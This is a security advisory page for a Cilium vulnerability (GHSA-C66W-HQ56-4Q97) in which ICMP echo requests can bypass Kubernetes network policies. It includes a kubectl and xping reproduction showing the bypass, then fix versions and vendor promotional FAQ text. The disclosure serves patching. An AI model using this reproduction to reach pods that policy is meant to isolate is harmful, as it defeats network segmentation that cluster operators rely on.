Summary
Detailed description
See https://github.com/cilium/cilium/commit/dfb008a9099c4da1e0fd964c899c43ee13280b0e (v1.9.x), https://github.com/cilium/cilium/commit/ff6ebae6efca1bd991302b464dea428512823e79 (v1.8.x), https://github.com/cilium/cilium/commit/472bbeff75161979c317ab21d563f826291b5f37 (v1.7.x).
Example
$ kubectl run server --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600
$ kubectl run client --image=quay.io/cilium/net-test:v1.0.0 --restart=Never -- sleep 3600
$ cat <<EOF | kubectl apply -f
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: server-netpol # allow client->server
spec:
podSelector:
matchLabels:
run: server
ingress:
- from:
- podSelector:
matchLabels:
run: client
policyTypes:
- Ingress
---
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: client-netpol # deny any->client
spec:
podSelector:
matchLabels:
run: client
policyTypes:
- Ingress
EOF
$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP
PING 10.154.0.50 (10.154.0.50): 56 data bytes
^C
--- 10.154.0.50 ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss <--- "client-netpol" policy denied
command terminated with exit code 1
$ kubectl exec -ti client -- xping -c1 -x666 $SERVER_POD_IP
PING 10.154.1.16 (10.154.1.16): 56 data bytes
64 bytes from 10.154.1.16: seq=0 ttl=60 time=0.822 ms
--- 10.154.1.16 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss <--- "server-netpol" policy allowed
round-trip min/avg/max = 0.822/0.822/0.822 ms
$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP
PING 10.154.0.50 (10.154.0.50): 56 data bytes
64 bytes from 10.154.0.50: seq=0 ttl=60 time=0.527 ms
--- 10.154.0.50 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss <--- "client-netpol" policy bypassed
round-trip min/avg/max = 0.527/0.527/0.527 ms
For more information
If you have any questions or comments about this advisory:
- Open an issue in Cilium Issues
- Email us at [email protected]
Impact
Under certain conditions, ICMP Echo Request sent to a Cilium endpoint from an actor may bypass a network policy which disallows access from the actor to the endpoint, but allows from the endpoint to the actor. This does NOT apply to UDP and TCP traffic.
The actor is either a pod or a cluster host or a remote host.
The following conditions must be met:
- Network policies have been created which:
a) do not allow access from the actor to the endpoint;
b) allow access from the endpoint to the actor and does not specify neither protocol nor port. - The endpoint has sent ICMP Echo Request to the actor with the ICMP identifier X.
- The actor sends ICMP Echo Request to the endpoint with the same ICMP identifier X.
- The request from the actor (3.) is sent before the Cilium's conntrack GC has removed the previously created conntrack entry (2.).
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
github.com/cilium/cilium to 1.7.15 or later; github.com/cilium/cilium to 1.8.8 or later; github.com/cilium/cilium to 1.9.5 or later
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is GHSA-C66W-HQ56-4Q97? GHSA-C66W-HQ56-4Q97 is a low-severity security vulnerability in github.com/cilium/cilium (go), affecting versions >= 1.7.8, <= 1.7.14. It is fixed in 1.7.15, 1.8.8, 1.9.5.
- Which versions of github.com/cilium/cilium are affected by GHSA-C66W-HQ56-4Q97? github.com/cilium/cilium (go) versions >= 1.7.8, <= 1.7.14 is affected.
- Is there a fix for GHSA-C66W-HQ56-4Q97? Yes. GHSA-C66W-HQ56-4Q97 is fixed in 1.7.15, 1.8.8, 1.9.5. Upgrade to this version or later.
- Is GHSA-C66W-HQ56-4Q97 exploitable, and should I be worried? Whether GHSA-C66W-HQ56-4Q97 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-C66W-HQ56-4Q97 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-C66W-HQ56-4Q97?
- Upgrade
github.com/cilium/ciliumto 1.7.15 or later - Upgrade
github.com/cilium/ciliumto 1.8.8 or later - Upgrade
github.com/cilium/ciliumto 1.9.5 or later
- Upgrade